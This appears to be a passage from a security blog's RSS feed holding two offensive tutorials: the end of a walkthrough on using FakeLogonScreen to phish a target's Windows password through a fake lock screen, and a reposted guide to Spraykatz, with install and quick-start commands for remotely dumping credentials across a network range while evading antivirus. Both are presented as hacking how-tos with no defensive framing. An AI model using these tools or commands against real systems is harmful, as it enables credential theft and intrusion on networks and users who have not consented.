<p><img loading="lazy" decoding="async" class="aligncenter wp-image-7617 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/password.png" sizes="auto, (max-width: 1019px) 100vw, 1019px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/password.png 1019w, https://www.ehacking.net/wp-content/uploads/2020/07/password-300x224.png 300w, https://www.ehacking.net/wp-content/uploads/2020/07/password-768x574.png 768w, https://www.ehacking.net/wp-content/uploads/2020/07/password-696x520.png 696w, https://www.ehacking.net/wp-content/uploads/2020/07/password-562x420.png 562w, https://www.ehacking.net/wp-content/uploads/2020/07/password-80x60.png 80w, https://www.ehacking.net/wp-content/uploads/2020/07/password-265x198.png 265w" alt="password" width="1019" height="762">And this will show the error “The password is incorrect, try again.” This is the strength of FakeLogonScreen tool that enforces a target to enter his correct password. The user has no choice other than that to enter his password.</p>
<p>Let’s enter the correct password, and you will get your standard window as nothing happened before.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-7618 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/correct-password.png" sizes="auto, (max-width: 1015px) 100vw, 1015px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/correct-password.png 1015w, https://www.ehacking.net/wp-content/uploads/2020/07/correct-password-300x226.png 300w, https://www.ehacking.net/wp-content/uploads/2020/07/correct-password-768x580.png 768w, https://www.ehacking.net/wp-content/uploads/2020/07/correct-password-696x525.png 696w, https://www.ehacking.net/wp-content/uploads/2020/07/correct-password-557x420.png 557w, https://www.ehacking.net/wp-content/uploads/2020/07/correct-password-80x60.png 80w" alt="correct password" width="1015" height="766"></p>
<p>This also showing the FakeLogonScreen works similar to a keylogger. The attacker would easily monitor all the logs and could grab the correct password of the target user.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-7619 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/user.png" sizes="auto, (max-width: 629px) 100vw, 629px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/user.png 629w, https://www.ehacking.net/wp-content/uploads/2020/07/user-300x124.png 300w" alt="user" width="629" height="261"></p>
<h2>Some Useful Information</h2>
<p>This tool could also work effectively on multiple desktop systems. While running it on various desktops, all the affected screens turn black immediately after executing the exploit from the attacking machine. This works even if the target user has set a customized background.</p>
<p>The zip file of the exploit also includes another executable named “FakeLogonScreenToFile.exe” that works the same as the previous executable. Still, it has some extra features i.e., not only showing the password but also stores it in a file %LOCALAPPDATA%\Microsoft\user.db.</p>
<p>This tool can also be integrated with Cobalt Strike to work effectively.</p>
<p>The post <a href="http://kostacipo.stream/how-to-hack-windows-10-passwords-using-fakelogonscreen-in-kali-linux/">How to Hack Windows 10 Passwords Using FakeLogonScreen in Kali Linux</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/how-to-hack-windows-10-passwords-using-fakelogonscreen-in-kali-linux/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Spraykatz &#8211; Retrieve Credentials On Windows and Active Directory</title>
		<link>http://kostacipo.stream/spraykatz-retrieve-credentials-on-windows-and-active-directory/</link>
					<comments>http://kostacipo.stream/spraykatz-retrieve-credentials-on-windows-and-active-directory/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Thu, 26 Dec 2019 10:37:09 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[active directory]]></category>
		<category><![CDATA[passwords]]></category>
		<category><![CDATA[windows]]></category>
		<guid isPermaLink="false">http://www.kostacipo.stream/?p=1577</guid>

					<description><![CDATA[<p>&#160; &#160; Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.It simply tries to procdump machines and parse dumps remotely in order to avoid detections by antivirus softwares as much as possible. InstallationThis tool is written for python&#62;=3. Do not use this on production environments! [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/spraykatz-retrieve-credentials-on-windows-and-active-directory/">Spraykatz &#8211; Retrieve Credentials On Windows and Active Directory</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>&nbsp;</p>
<div id="main-wrapper">
<div id="main" class="main section">
<div id="Blog1" class="widget Blog" data-version="1">
<div class="blog-posts hfeed">
<div class="post-outer">
<div class="post">
<div class="post-header">
<div class="post-meta">
<div class="meta-details"><span class="post-timestamp">&nbsp;</span></div>
</div>
</div>
<p><a name="ad-title"></a></p>
<article>
<div id="post-body-8928365112807509806" class="post-body entry-content">
<div class="separator"><a href="https://1.bp.blogspot.com/-c414ixsdyT8/Xf_ewy8gmuI/AAAAAAAARLc/4M7CJPMLzMg2UsjzgRctfbhe7SzmhwBDwCNcBGAsYHQ/s1600/spraykatz_5_preview.gif"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-c414ixsdyT8/Xf_ewy8gmuI/AAAAAAAARLc/4M7CJPMLzMg2UsjzgRctfbhe7SzmhwBDwCNcBGAsYHQ/s640/spraykatz_5_preview.gif" data-original-height="464" data-original-width="915" width="640" height="324" border="0"></a></div>
<p>Spraykatz is a tool without any pretention able to <strong>retrieve credentials</strong> on Windows machines and large Active Directory environments.<br />It simply tries to <strong>procdump</strong> machines and <strong>parse dumps remotely</strong> in order to <strong>avoid detections</strong> by antivirus softwares as much as possible.<br /><a name="more"></a></p>
<p><b>Installation</b><br />This tool is written for <strong><code>python&gt;=3</code></strong>. Do not use this on production environments!</p>
<p><b>Ubuntu</b><br />On a fresh updated Ubuntu.</p>
<div>
<pre><code>apt update
apt install -y python3.6 python3-pip git nmap
git clone --recurse-submodules https://github.com/aas-n/spraykatz.git
cd spraykatz
pip3 install -r requirements.txt</code></pre>
</div>
<p><b>Using Spraykatz</b><br />A quick start could be:</p>
<div>
<pre><code>./spraykatz.py -u H4x0r -p L0c4L4dm1n -t 192.168.1.0/24</code></pre>
</div>
<h3 align="center"><b>Mandatory arguments</b></h3>
<table>
<tbody>
<tr>
<th>Switches</th>
<th align="left">Description</th>
</tr>
<tr>
<td>-u, &#8211;username</td>
<td align="left">User to spray with. He must have admin rights on targeted systems in order to gain remote code execution.</td>
</tr>
<tr>
<td>-p, &#8211;password</td>
<td align="left">User&#8217;s password or NTLM hash in the <code>LM:NT</code> format.</td>
</tr>
<tr>
<td>-t, &#8211;targets</td>
<td align="left">IP addresses and/or IP address ranges. You can submit them via a file of targets (one target per line), or inline (separated by commas).</td>
</tr>
</tbody>
</table>
<p><b><br />Optional arguments</b></p>
<table>
<tbody>
<tr>
<th>Switches</th>
<th align="left">Description</th>
</tr>
<tr>
<td>-d, &#8211;domain</td>
<td align="left">User&#8217;s domain. If he is <strong>not</strong> member of a domain, simply use <code>-d .</code> instead.</td>
</tr>
<tr>
<td>-v, &#8211;verbosity</td>
<td align="left">Verbosity mode {warning, info, debug}. Default == info.</td>
</tr>
</tbody>
</table>
<p><b><br />Acknowlegments</b><br />Spraykatz uses slighlty modified parts of the following projects:</p>
<ul>
<li><a title="Mimikatz" href="https://github.com/gentilkiwi/mimikatz" target="_blank" rel="nofollow noopener noreferrer">Mimikatz</a></li>
<li><a title="Impacket" href="https://github.com/SecureAuthCorp/impacket" target="_blank" rel="nofollow noopener noreferrer">Impacket</a></li>
<li><a title="Pypykatz" href="https://github.com/skelsec/pypykatz" target="_blank" rel="nofollow noopener noreferrer">Pypykatz</a></li>
<li><a title="Pywerview" href="https://github.com/the-useless-one/pywerview" target="_blank" rel="nofollow noopener noreferrer">Pywerview</a></li>
<li><a title="Sysinternals" href="https://docs.microsoft.com/en-us/sysinternals/downloads/" target="_blank" rel="nofollow noopener noreferrer">Sysinternals</a></li>
<li><a title="hackndo" href="https://beta.hackndo.com/" target="_blank" rel="nofollow noopener noreferrer">hackndo</a></li>
</ul>
<div><b><a class="kiploit-download" title="Download Spraykatz" href="https://github.com/aas-n/spraykatz" target="_blank" rel="nofollow noopener noreferrer">Download Spraykatz</a></b></div>
</div>
</article>
</div>
</div>
</div>
</div>
</div>
</div>
<p>The post <a href="http://kostacipo.stream/spraykatz-retrieve-credentials-on-windows-and-active-directory/">Spraykatz &#8211; Retrieve Credentials On Windows and Active Directory</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/spraykatz-retrieve-credentials-on-windows-and-active-directory/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
